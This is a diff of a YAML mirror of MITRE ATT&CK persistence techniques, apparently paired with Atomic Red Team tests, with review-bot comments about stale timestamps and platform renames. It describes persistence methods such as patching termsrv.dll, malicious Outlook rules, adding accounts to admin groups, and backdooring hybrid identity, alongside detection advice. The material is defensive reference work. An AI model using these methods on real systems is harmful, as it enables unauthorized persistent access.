Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe
) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll
.(Citation: Microsoft System Services Fundamentals) The termsrv.dll
file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll
value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll
functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll
file or modifying the ServiceDll
value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Server Software Component: Terminal Services DLL'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for changes to Registry keys associated with ServiceDll
and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\
.
@@ -61375,19 +61709,51 @@ persistence:
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe
) or modify/replace the legitimate termsrv.dll
.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs
) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll
, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Command: Command Execution'
- 'File: File Modification'
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+ created: '2022-03-28T15:34:44.590Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/005
+ external_id: T1505.005
+ - source_name: James TermServ DLL
+ description: James. (2019, July 14). @James_inthe_box. Retrieved September
+ 12, 2024.
+ url: https://x.com/james_inthe_box/status/1150495335812177920
+ - source_name: Microsoft System Services Fundamentals
+ description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+ Retrieved March 28, 2022.
+ url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+ - source_name: Microsoft Remote Desktop Services
+ description: Microsoft. (2019, August 23). About Remote Desktop Services.
+ Retrieved March 28, 2022.
+ url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+ - source_name: RDPWrap Github
+ description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+ Retrieved March 28, 2022.
+ url: https://github.com/stascorp/rdpwrap
+ - source_name: Windows OS Hub RDP
+ description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+ Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+ url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.005
atomic_tests:
- name: Simulate Patching termsrv.dll
@@ -61454,7 +61820,7 @@ persistence:
name: powershell
T1176:
technique:
- modified: '2024-04-18T23:22:37.874Z'
+ modified: '2024-09-12T19:48:15.871Z'
name: Browser Extensions
description: "Adversaries may abuse Internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
@@ -61546,8 +61912,8 @@ persistence:
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
- get hacked by a Chrome extension. Retrieved November 22, 2017.'
- url: https://kjaer.io/extension-malware/
+ get hacked by a Chrome extension. Retrieved September 12, 2024.'
+ url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
@@ -61578,7 +61944,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1176
atomic_tests:
- name: Chrome/Chromium (Developer Mode)
@@ -61692,66 +62057,135 @@ persistence:
elevation_required: true
T1137.005:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:02:26.206Z'
+ name: Outlook Rules
+ description: |-
+ Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+ Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Microsoft Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Application Log: Application Log Content'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137.005
url: https://attack.mitre.org/techniques/T1137/005
- - source_name: SilentBreak Outlook Rules
- url: https://silentbreaksecurity.com/malicious-outlook-rules/
- description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
- February 4, 2019.
+ external_id: T1137.005
+ - source_name: Pfammatter - Hidden Inbox Rules
+ description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+ Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
- - source_name: Pfammatter - Hidden Inbox Rules
- url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
- Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SilentBreak Outlook Rules
+ description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+ February 4, 2019.
+ url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Outlook Rules
- description: |-
- Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
- Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ url: https://github.com/sensepost/notruler
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_detection: |-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Application Log: Application Log Content'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.011:
technique:
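Review bot: T1137.005 (Outlook Rules) changes its platform list from `- Office 365` to `- Office Suite`, and the newly added T1098.007 (Additional Local or Domain Groups) lists Windows, macOS and Linux. If the platform-specific index CSVs are derived from `x_mitre_platforms`, they need regenerating in the same change so the Office 365 index does not silently lose this technique and the new sub-technique appears where expected. Separately, `PRPR_RULE_MSG_NAME` in the detection text is an upstream typo for the MAPI property `PR_RULE_MSG_NAME`; it is carried over verbatim here, so report it upstream rather than patching this mirror.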
@@ -61782,7 +62216,7 @@ persistence:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
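Review bot: `modified` for Event Triggered Execution: Application Shimming (T1546.011) goes from `'2022-04-25T14:00:00.188Z'` back to `'2020-11-10T18:29:31.094Z'`, a regression of roughly seventeen months. Unless the intent is to pin older technique data, this should not merge as-is; check the generator's input bundle.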
@@ -61837,8 +62271,6 @@ persistence:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests:
- name: Application Shim Installation
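Review bot: T1546.011 loses both `spec_version` and `x_mitre_attack_spec_version` here with no replacement value, which is what an older STIX object that predates those fields would yield. Once the source bundle is confirmed, this object should carry `x_mitre_attack_spec_version: 3.2.0` like its siblings.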
@@ -61927,7 +62359,7 @@ persistence:
elevation_required: true
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -61988,9 +62420,9 @@ persistence:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -61999,7 +62431,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests:
- name: Add Port Monitor persistence in Registry
@@ -62076,7 +62507,7 @@ persistence:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
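Review bot: `modified` for Logon Script (Mac) (T1037.002) moves back from `'2022-05-11T14:00:00.188Z'` to `'2022-04-20T16:42:05.094Z'`. A technique record should not get older on a refresh, so this hunk needs the same source-bundle check as the other backwards timestamp changes in this patch.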
@@ -62097,7 +62528,6 @@ persistence:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests:
- name: Logon Scripts - Mac
@@ -62118,7 +62548,7 @@ persistence:
name: manual
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
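Review bot: `modified` for Traffic Signaling (T1205) changes from `'2022-11-08T14:00:00.188Z'` to the earlier `'2022-10-19T23:08:40.603Z'`. If this is expected (for example the newer value was a local artefact), say so in the commit message; otherwise it indicates stale input data.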
@@ -62202,11 +62632,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -62219,7 +62648,6 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -62232,7 +62660,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -62262,7 +62689,8 @@ persistence:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests:
- name: Shortcut Modification
@@ -62345,7 +62773,7 @@ persistence:
url: https://github.com/RhinoSecurityLabs/ccat
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:27:49.094Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
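Review bot: `modified` for Implant Internal Image moves back from `'2022-05-11T14:00:00.188Z'` to `'2022-03-08T21:27:49.094Z'`. Please verify this object against the upstream bundle; a backwards timestamp on a regenerated record usually means an older copy was read.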
@@ -62367,8 +62795,6 @@ persistence:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.005:
technique:
@@ -62394,7 +62820,7 @@ persistence:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
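Review bot: `modified` for Boot or Logon Autostart Execution: Security Support Provider (T1547.005) regresses from `'2021-04-29T14:49:39.188Z'` to `'2020-03-25T15:42:48.910Z'`, more than a year older. Since the rest of this technique's record is otherwise unchanged in the hunk, confirm the generator's ATT&CK input before accepting this.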
@@ -62420,8 +62846,6 @@ persistence:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests:
- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
@@ -62465,30 +62889,30 @@ persistence:
elevation_required: true
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
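Review bot: the Azure AD to Entra ID rename is applied only to prose, while the citation keys (`Azure AD Hybrid Identity`, `AADInternals Azure AD On-Prem to Cloud`) and the service name `AzureADConnectAuthenticationAgentService` are left untouched; that is the right call, since those are identifiers. One pre-existing oddity in the context lines: `(Citation: Azure AD Connect for Read Teamers)` reads like a typo for "Red Teamers". It must stay as-is unless the matching `source_name` under `external_references` changes with it, so it is something to report upstream rather than fix in this file.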
@@ -62496,9 +62920,9 @@ persistence:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -62507,21 +62931,22 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
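Review bot: the platform list changes meaning, not just order: `Azure AD`, `Google Workspace` and `Office 365` are removed and `Office Suite` and `Identity Provider` are added, in step with the `x_mitre_version` bump from '1.0' to '1.1'. Any per-platform index or filter keyed on the old names (for example a Google Workspace or Office 365 index) will silently lose this technique unless it is regenerated from the new names, so those derived files belong in the same change set. The shuffling of `x_mitre_attack_spec_version`, `x_mitre_contributors`, `x_mitre_domains`, `x_mitre_is_subtechnique` and `x_mitre_modified_by_ref` within the same object shows the emitter does not sort keys; a stable key order would keep future diffs down to the substantive edits.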
@@ -62561,13 +62986,10 @@ persistence:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -62644,7 +63066,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests:
- name: Launch Daemon
@@ -62730,7 +63151,7 @@ persistence:
